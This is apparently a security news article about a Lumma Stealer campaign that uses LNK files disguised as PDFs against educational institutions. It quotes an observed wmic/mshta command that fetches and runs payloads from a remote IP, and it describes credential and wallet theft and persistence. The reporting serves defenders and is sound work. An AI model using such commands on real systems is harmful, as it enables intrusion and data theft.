The Lumma InfoStealer malware has been observed leveraging weaponized PDF documents to target educational institutions.
This sophisticated campaign exploits malicious LNK (shortcut) files disguised as legitimate PDFs, initiating multi-stage infection processes that compromise sensitive data.
Educational infrastructures, often less fortified against advanced cyberattacks, have become prime targets for this information-stealing malware.
The attack begins with unsuspecting users downloading LNK files masquerading as academic or technical documents.
These files, upon execution, trigger a PowerShell command that connects to a remote server, launching the infection chain.
The PowerShell script is obfuscated and encrypted using AES in CBC mode, ensuring stealth during execution.
For instance, one observed command reads:-
C:\Windows\System32\Wbem\wmic.exe process call create "mshta.exe https://80.76.51.231/Samarik"
This command downloads and executes additional payloads, including the Lumma Stealer executable.
.webp)
The Lumma Stealer itself is a potent Malware-as-a-Service (MaaS) tool written in C. It is designed to exfiltrate a wide range of data, including browser credentials, cryptocurrency wallets, and sensitive files such as academic research or financial records.
Security analysts at Cloudsek noted that the malware employs advanced evasion techniques like obfuscated scripts and encrypted communications with Command-and-Control (C2) servers.
Notably, it uses unconventional methods such as Steam profiles for C2 communication when traditional servers are inaccessible.
Lumma Stealer Analysis
The malware’s infection mechanism includes multiple layers of obfuscation. For example, JavaScript embedded within the LNK file evaluates encrypted code to execute malicious commands:-
eval(aeQ);
window.close();
.webp)
Once decrypted, the PowerShell script downloads and executes the Lumma Stealer binary from remote servers.
The malware then scans the compromised system for files containing keywords like wallet.txt
or passwords.pdf
, targeting sensitive information.
To evade detection, Lumma Stealer encrypts exfiltrated data and employs event-controlled write operations. Additionally, it establishes persistence by creating registry entries and scheduled tasks.
.webp)
This campaign shows the urgent need for robust cybersecurity measures in educational institutions.
Organizations must implement proactive defenses like endpoint detection systems and user awareness programs to mitigate risks posed by deceptive phishing tactics and weaponized documents.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free